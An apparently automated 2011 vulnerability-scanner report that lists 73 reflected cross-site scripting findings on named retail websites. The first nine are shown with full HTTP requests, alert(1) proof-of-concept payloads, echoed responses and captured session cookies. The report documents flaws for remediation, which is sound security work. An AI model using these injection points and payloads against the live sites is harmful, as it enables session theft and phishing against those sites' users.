XSS, Cross Site Scripting, CWE-79, CAPEC-86, HSNi HTTP Systems

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Mar 05 07:03:20 CST 2011.



1. Cross-site scripting (reflected)

1.1. http://www.ballarddesigns.com/TopNav [storeId parameter]

1.2. http://www.ballarddesigns.com/webapp/wcs/stores/servlet/MiniCartView [storeId parameter]

1.3. http://www.garnethill.com/OrderStatusView [storeId parameter]

1.4. http://www.garnethill.com/TopNav [storeId parameter]

1.5. http://www.garnethill.com/UserLogonView [storeId parameter]

1.6. http://www.garnethill.com/webapp/wcs/stores/servlet/MiniCartView [storeId parameter]

1.7. http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay [REST URL parameter 5]

1.8. http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay [storeId parameter]

1.9. http://www.territoryahead.com/favicon.ico [REST URL parameter 1]

1.10. http://www.territoryahead.com/includes/cleartext.js [REST URL parameter 1]

1.11. http://www.territoryahead.com/includes/cleartext.js [REST URL parameter 2]

1.12. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 1]

1.13. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 2]

1.14. http://www.territoryahead.com/includes/cm/cmtaggingservices_TTA_top.js [REST URL parameter 3]

1.15. http://www.territoryahead.com/includes/flyopen.js [REST URL parameter 1]

1.16. http://www.territoryahead.com/includes/flyopen.js [REST URL parameter 2]

1.17. http://www.territoryahead.com/includes/global_stylesheet.css [REST URL parameter 1]

1.18. http://www.territoryahead.com/includes/global_stylesheet.css [REST URL parameter 2]

1.19. http://www.territoryahead.com/includes/rollover.js [REST URL parameter 1]

1.20. http://www.territoryahead.com/includes/rollover.js [REST URL parameter 2]

1.21. http://www.territoryahead.com/includes/stylesheet.css [REST URL parameter 1]

1.22. http://www.territoryahead.com/includes/stylesheet.css [REST URL parameter 2]

1.23. http://www.territoryahead.com/menu/milonic_src.js [REST URL parameter 1]

1.24. http://www.territoryahead.com/menu/milonic_src.js [REST URL parameter 2]

1.25. http://www.territoryahead.com/menu/mmenudom.js [REST URL parameter 1]

1.26. http://www.territoryahead.com/menu/mmenudom.js [REST URL parameter 2]

1.27. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 1]

1.28. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 2]

1.29. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 3]

1.30. http://www.territoryahead.com/shopping/mercado/style/searchResults.css [REST URL parameter 4]

1.31. http://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 1]

1.32. http://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 2]

1.33. http://www.territoryahead.com/templates/custservcontactus.jsp [itemID parameter]

1.34. http://www.territoryahead.com/templates/custservcontactus.jsp [itemType parameter]

1.35. http://www.territoryahead.com/templates/custservcontactus.jsp [path parameter]

1.36. http://www.territoryahead.com/templates/custservcontactus.jsp [ruleID parameter]

1.37. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 1]

1.38. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 2]

1.39. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 3]

1.40. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 1]

1.41. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 2]

1.42. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 3]

1.43. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 1]

1.44. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 2]

1.45. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 3]

1.46. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 1]

1.47. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 2]

1.48. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 3]

1.49. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 1]

1.50. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 2]

1.51. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 3]

1.52. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 1]

1.53. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 2]

1.54. http://www.territoryahead.com/text/js/displayfunctions.js [REST URL parameter 3]

1.55. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 1]

1.56. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 2]

1.57. http://www.territoryahead.com/text/js/jquery-1.5.1.min.js [REST URL parameter 3]

1.58. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 1]

1.59. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 2]

1.60. http://www.territoryahead.com/text/js/jquery.cycle.all.min.js [REST URL parameter 3]

1.61. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 1]

1.62. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 2]

1.63. http://www.territoryahead.com/text/js/sitedisplay.js [REST URL parameter 3]

1.64. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 1]

1.65. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 2]

1.66. http://www.territoryahead.com/text/omniture/s_code.js [REST URL parameter 3]

1.67. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1]

1.68. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2]

1.69. https://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 1]

1.70. https://www.territoryahead.com/templates/custservcontactus.jsp [itemID parameter]

1.71. https://www.territoryahead.com/templates/custservcontactus.jsp [itemType parameter]

1.72. https://www.territoryahead.com/templates/custservcontactus.jsp [path parameter]

1.73. https://www.territoryahead.com/templates/custservcontactus.jsp [ruleID parameter]



1. Cross-site scripting (reflected)
There are 73 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.ballarddesigns.com/TopNav [storeId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ballarddesigns.com
Path:   /TopNav

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload db5d1<script>alert(1)</script>ea5670adb7d was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TopNav?storeId=10052db5d1<script>alert(1)</script>ea5670adb7d&catalogId=10551&langId=-1 HTTP/1.1
Host: www.ballarddesigns.com
Proxy-Connection: keep-alive
Referer: http://www.ballarddesigns.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000gxw1tn9ZTw1KirZuRLdCeON:159jqb400; WC_PERSISTENT=00eJGahvFmoQOK4MJmQ96nf3Mlk%3d%0a%3b2011%2d03%2d02+13%3a31%3a29%2e926%5f1299090689926%2d6343%5f0; WCX_SOURCECODE=10121|ICAT|WEBOFFER|6379247|4000000000000000002

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:31:46 GMT
Server: IBM_HTTP_Server
Vary: Host,Accept-Encoding,User-Agent
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10052db5d1<script>alert(1)</script>ea5670adb7d"".</TD>
...[SNIP]...

1.2. http://www.ballarddesigns.com/webapp/wcs/stores/servlet/MiniCartView [storeId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ballarddesigns.com
Path:   /webapp/wcs/stores/servlet/MiniCartView

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload fea20<script>alert(1)</script>d61431d0dd5 was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/wcs/stores/servlet/MiniCartView?ts=12990907235740.27411083644255996&storeId=10052fea20<script>alert(1)</script>d61431d0dd5&catalogId=10551&langId=-1&orderId=. HTTP/1.1
Host: www.ballarddesigns.com
Proxy-Connection: keep-alive
Referer: http://www.ballarddesigns.com/wcsstore/CornerStoneBrands/GWT/B9720B9EE27B9CD7609AC1539BCFEFDC.cache.html
Pragma: no-cache
Content-type: application/x-www-form-urlencoded
Cache-Control: no-store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000gxw1tn9ZTw1KirZuRLdCeON:159jqb400; WC_PERSISTENT=00eJGahvFmoQOK4MJmQ96nf3Mlk%3d%0a%3b2011%2d03%2d02+13%3a31%3a29%2e926%5f1299090689926%2d6343%5f0; WCX_SOURCECODE=10121|ICAT|WEBOFFER|6379247|4000000000000000002

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:31:52 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10052fea20<script>alert(1)</script>d61431d0dd5"".</TD>
...[SNIP]...

1.3. http://www.garnethill.com/OrderStatusView [storeId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.garnethill.com
Path:   /OrderStatusView

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload d6495<script>alert(1)</script>f7bfb5aed10 was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /OrderStatusView?storeId=10054d6495<script>alert(1)</script>f7bfb5aed10&catalogId=10054&langId=-1 HTTP/1.1
Host: www.garnethill.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000J0w_Yt7uJ5MGsxuNjLunwJ9:14ul671lg; WC_PERSISTENT=n1%2bhkibr%2bz6Ycul2TJJsi6IQysI%3d%0a%3b2011%2d03%2d02+13%3a31%3a37%2e734%5f1299090697734%2d5352%5f0; WCX_SOURCECODE=190101|K1WBRS3|1K3|17592930|4000000000000017653; __utmz=252195359.1299090725.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252195359.1503553763.1299090725.1299090725.1299090725.1; __utmc=252195359

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:18:39 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000pzxMYLLw0Zrw5yz64H3N8No:14ul671lg; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10054d6495<script>alert(1)</script>f7bfb5aed10"".</TD>
...[SNIP]...

1.4. http://www.garnethill.com/TopNav [storeId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.garnethill.com
Path:   /TopNav

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload d1f09<script>alert(1)</script>9f3895f7835 was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /TopNav?storeId=10054d1f09<script>alert(1)</script>9f3895f7835&catalogId=10054&langId=-1 HTTP/1.1
Host: www.garnethill.com
Proxy-Connection: keep-alive
Referer: http://www.garnethill.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000J0w_Yt7uJ5MGsxuNjLunwJ9:14ul671lg; WC_PERSISTENT=n1%2bhkibr%2bz6Ycul2TJJsi6IQysI%3d%0a%3b2011%2d03%2d02+13%3a31%3a37%2e734%5f1299090697734%2d5352%5f0; WCX_SOURCECODE=190101|K1WBRS3|1K3|17592930|4000000000000017653

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:31:46 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10054d1f09<script>alert(1)</script>9f3895f7835"".</TD>
...[SNIP]...

1.5. http://www.garnethill.com/UserLogonView [storeId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.garnethill.com
Path:   /UserLogonView

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload df2c7<script>alert(1)</script>47d161d7f9b was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /UserLogonView?storeId=10054df2c7<script>alert(1)</script>47d161d7f9b&catalogId=10054&langId=-1 HTTP/1.1
Host: www.garnethill.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WCX_SOURCECODE=190101|K1WBRS3|1K3|17592930|4000000000000017653; __utmz=252195359.1299090725.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252195359.1503553763.1299090725.1299090725.1299090725.1; __utmc=252195359; JSESSIONID=0000bICDuqNPXIW-gqzv9CyH_dU:14ul671lg; WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=yNlh1C7ZuUiEyr9NoS%2bROgOuNn8%3d%0a%3b2011%2d03%2d02+14%3a11%3a00%2e68%5f1299090697734%2d5352%5f10054%5f%2d1002%2c%2d1%2cUSD%5f10054; WC_ACTIVEPOINTER=%2d1%2c10054; WC_USERACTIVITY_-1002=%2d1002%2c10054%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czFd3XkeWCbDbUPaac19fkp81Jd8isRkpw8MTbMgkCPSMwaJimjazomTIM4W2CbuckS7T%2bycJAGKq%0aDlKEBGcjs8SfLQsQJAMMl0q8TZv6rReMpKPR7AGyac7dg3V2i5t96RFZodKSh%2bE%3d; WC_GENERIC_ACTIVITYDATA=[54658884%3atrue%3afalse%3a0%3aDCeRByZZg9s%2f%2b%2bnUGYFpUfVq3j4%3d][com.ibm.commerce.context.base.BaseContext|10054%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10054%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10011%2610011%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:18:47 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10054df2c7<script>alert(1)</script>47d161d7f9b"".</TD>
...[SNIP]...

1.6. http://www.garnethill.com/webapp/wcs/stores/servlet/MiniCartView [storeId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.garnethill.com
Path:   /webapp/wcs/stores/servlet/MiniCartView

Issue detail

The value of the storeId request parameter is copied into the HTML document as plain text between tags. The payload db8cf<script>alert(1)</script>1c545e65e55 was submitted in the storeId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /webapp/wcs/stores/servlet/MiniCartView?ts=12990907466490.4178177223075181&storeId=10054db8cf<script>alert(1)</script>1c545e65e55&catalogId=10054&langId=-1&orderId=. HTTP/1.1
Host: www.garnethill.com
Proxy-Connection: keep-alive
Referer: http://www.garnethill.com/wcsstore/CornerStoneBrands/GWT/0B2050845634C696A330F1EA28A9C008.cache.html
Pragma: no-cache
Content-type: application/x-www-form-urlencoded
Cache-Control: no-store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000J0w_Yt7uJ5MGsxuNjLunwJ9:14ul671lg; WC_PERSISTENT=n1%2bhkibr%2bz6Ycul2TJJsi6IQysI%3d%0a%3b2011%2d03%2d02+13%3a31%3a37%2e734%5f1299090697734%2d5352%5f0; WCX_SOURCECODE=190101|K1WBRS3|1K3|17592930|4000000000000017653; __utmz=252195359.1299090725.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252195359.1503553763.1299090725.1299090725.1299090725.1; __utmc=252195359; __utmb=252195359.1.10.1299090725

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:32:27 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
//* We
...[SNIP]...
<TD>The following command exception has occurred during processing: "java.lang.NumberFormatException: For input string: "10054db8cf<script>alert(1)</script>1c545e65e55"".</TD>
...[SNIP]...

1.7. http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smithandnoble.com
Path:   /webapp/wcs/stores/servlet/TopCategoriesDisplay

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 1cbfb--><img%20src%3da%20onerror%3dalert(1)>df55a283985 was submitted in the REST URL parameter 5. This input was echoed as 1cbfb--><img src=a onerror=alert(1)>df55a283985 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/TopCategoriesDisplay1cbfb--><img%20src%3da%20onerror%3dalert(1)>df55a283985?storeId=10101&catalogId=10101 HTTP/1.1
Host: www.smithandnoble.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:32:05 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=000099CPWfGsNpuvZ8uLiXPtCqD:14t9ggoap; Path=/
Set-Cookie: WC_PERSISTENT=UcDLu0miXXfeAd0pxY8l6rlXA5E%3d%0a%3b2011%2d03%2d02+13%3a32%3a05%2e749%5f1299090725749%2d8050%5f0; Expires=Fri, 01 Apr 2011 18:32:04 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 35782


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
   <title>
   Generic Error
   </title>
   <link rel="stylesheet"
...[SNIP]...
rce system, and check the log file.Exception Type:0Message Key:_ERR_CMD_CMD_NOT_FOUNDMessage:CMN3101E The system is unavailable due to "CMN0203E".System Message:Command not found: "TopCategoriesDisplay1cbfb--><img src=a onerror=alert(1)>df55a283985".Originating Command:Corrective Action:
   
       //*
       //********************************************************************
       -->
...[SNIP]...

1.8. http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay [storeId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smithandnoble.com
Path:   /webapp/wcs/stores/servlet/TopCategoriesDisplay

Issue detail

The value of the storeId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f09cb'%3balert(1)//42650ca526b was submitted in the storeId parameter. This input was echoed as f09cb';alert(1)//42650ca526b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webapp/wcs/stores/servlet/TopCategoriesDisplay?storeId=10101f09cb'%3balert(1)//42650ca526b&catalogId=10101 HTTP/1.1
Host: www.smithandnoble.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:31:51 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ZGCSXkDaeQrvVfAYQQa-jqw:14t9i3dnb; Path=/
Set-Cookie: WC_PERSISTENT=rQgsEXXsi%2bDfXm%2fCod3voG%2fxvSk%3d%0a%3b2011%2d03%2d02+13%3a31%3a51%2e108%5f1299090711108%2d3253%5f0; Expires=Fri, 01 Apr 2011 18:31:50 GMT; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 1620


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>
       Generic Application Error Test JSP (Item)
   </title>
   <script type = "text/javascript" language="javascript" src="/wcsstore/Smi
...[SNIP]...
pt">
       if (window.location.hostname == 'www.smithandnoble.com') {
           cmSetProduction();
       }
       cmCreateErrorTag('http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay?storeId=10101f09cb';alert(1)//42650ca526b&catalogId=10101','http://www.smithandnoble.com/webapp/wcs/stores/servlet/TopCategoriesDisplay?storeId=10101f09cb';alert(1)//42650ca526b&catalogId=10101');
   </script>
...[SNIP]...

1.9. http://www.territoryahead.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 91103--><script>alert(1)</script>2be08184f36 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /favicon.ico91103--><script>alert(1)</script>2be08184f36 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-; s_cc=true; s_sq=%5B%5BB%5D%5D; cmTPSet=Y; CoreID6=82806333286612990907467&ci=90232094; PS_ALL=%23ps_catid%7EHome; 90232094_clogin=l=1299090746&v=1&e=1299092547893

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 18:43:31 GMT
Server: Apache
ETag: "AAAAS531FEm"
Last-Modified: Wed, 02 Mar 2011 18:28:46 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
i=90232094; PS_ALL=%23ps_catid%7EHome; 90232094_clogin=l=1299090746&v=1&e=1299092547893
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: SiQ6nawSrSgAAF3NFnAAAAAd
REDIRECT_SCRIPT_URL: /favicon.ico91103--><script>alert(1)</script>2be08184f36
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/favicon.ico91103-->
...[SNIP]...

1.10. http://www.territoryahead.com/includes/cleartext.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /includes/cleartext.js

Issue detail

